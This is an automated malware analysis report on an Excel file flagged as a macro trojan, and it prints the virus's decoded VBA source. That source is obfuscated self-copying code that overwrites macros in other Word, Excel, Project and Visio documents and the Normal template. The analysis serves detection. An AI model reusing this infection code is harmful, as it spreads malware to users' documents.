Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36c051f528b3837d…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2000-07-29 14:33:01
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: c6651cc70fab7736ff587d5ee1226700
SHA-1: 41edfd9a6caabe8d17e36c1af8bd76f31d3e7aa9
SHA-256: 36c051f528b3837dcd8ad2c559dc882534c3442a88f81b92331999f56572d194
Risk Score: 280

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The file is an Office document containing VBA macros. Heuristics indicate the use of Shell() and CreateObject() calls, common for executing malicious code. The macros appear to be designed to copy themselves to other projects and potentially download additional payloads, as suggested by the ClamAV detection 'Doc.Trojan.Suite-1'.

Heuristics 5

  • ClamAV: Doc.Trojan.Suite-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Suite-1
  • VBA macros detected (severity: medium, 3 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46828 bytes
SHA-256: 0c3889ff85e4bb8bdf8246f1d2a909e2d5bb85775ff2c5893b338144693e5540
Detection
ClamAV: Doc.Trojan.Suite-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
Sub Document_Close()
'
mut$ = "Visio.Application": mat$ = "Blank Drawing.vst": dovis = 1
On Error Resume Next
t = Application
If t = Chr(78) + Chr(111) + Chr(116) + Chr(104) + Chr(105) + Chr(110) + Chr(103) Then GoTo nopro
If t = "Microsoft Project" Then
mook = Version
 If mook = "8.0" Then
'
 End If
Application.DisplayAlerts = False
'
For Each Z In Projects
On Error Resume Next
Set ap = Z.VBProject.VBComponents(1).codemodule
Set tp = ThisProject.VBProject.VBComponents(1).codemodule
If ap.Lines(2, 1) <> "'" Then
ap.DeleteLines 1, ap.countoflines
ap.InsertLines 1, tp.Lines(1, tp.countoflines)
'
End If
Next Z
Set temp = Application.VBE.VBProjects(1).VBComponents(1).codemodule
If temp.Lines(2, 1) <> Chr(39) Then
temp.DeleteLines 1, temp.countoflines
temp.InsertLines 1, tp.Lines(1, tp.countoflines)
End If
End If
vi:
te$ = t: tune = Left(te$, 5)
If tune <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) Then
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
    Set docobj = Documents.Item(i)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.Lines(2, 1) <> Chr(39) Then
gets.InsertLines 1, nom.Lines(1, nom.countoflines)
dname = CurDir & "\": filechk$ = (dname & docobj)
mystr = Right(filechk$, 4): If mystr <> ".vsd" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vss" Then sd = 0
mystr = Right(filechk$, 4): If mystr <> ".vst" Then sd = 0
If sd = 0 Then fila$ = (dname & docobj & ".vsd")
'
End If
toobig:
Next i
If strTemplatename = "" Then GoTo runaway
'
Set Target = Documents.Open(strTemplatename)
Set targets = Target.VBProject.VBComponents(1).codemodule
If targets.Lines(2, 1) <> "'" Then
If targets.Lines(1, 1) = "Option Explicit" Then Target.DeleteLines 1, 1
targets.InsertLines 1, rnt.Lines(1, rnt.countoflines)
Target.SaveAs strTemplatename
Else
toobigtemplate:
Target.Close
End If
runaway:
End If
If t = Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100) Then Else GoTo ex
Options.SendMailAttach = True: m = 1
Set nim = NormalTemplate
Set aiv = ActiveDocument
Set aktiv = aiv.VBProject.VBComponents(m).codemodule
Set nom = nim.VBProject.VBComponents(m).codemodule
If nom.Lines(2, 1) <> "'" Then
nom.DeleteLines 1, nom.countoflines
nom.InsertLines 1, aktiv.Lines(1, aktiv.countoflines)
nom.replaceline 1, Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(95) + Chr(67) + Chr(108) + Chr(111) + Chr(115) + Chr(101) + Chr(40) + Chr(41)
nop = 1
End If
If aktiv.Lines(2, 1) <> "'" Then
act = 1
End If
ex:
If act = 1 Then GoTo 11
If t = "Microsoft Excel" Then Else GoTo 12
Set a = ActiveWorkbook.VBProject
Set aktiv = a.VBComponents("ThisWorkbook").codemodule
Set nimt = ThisWorkbook.VBProject
Set nom = nimt.VBComponents("ThisWorkbook").codemodule
11:
If aktiv.Lines(2, 1) <
... (truncated)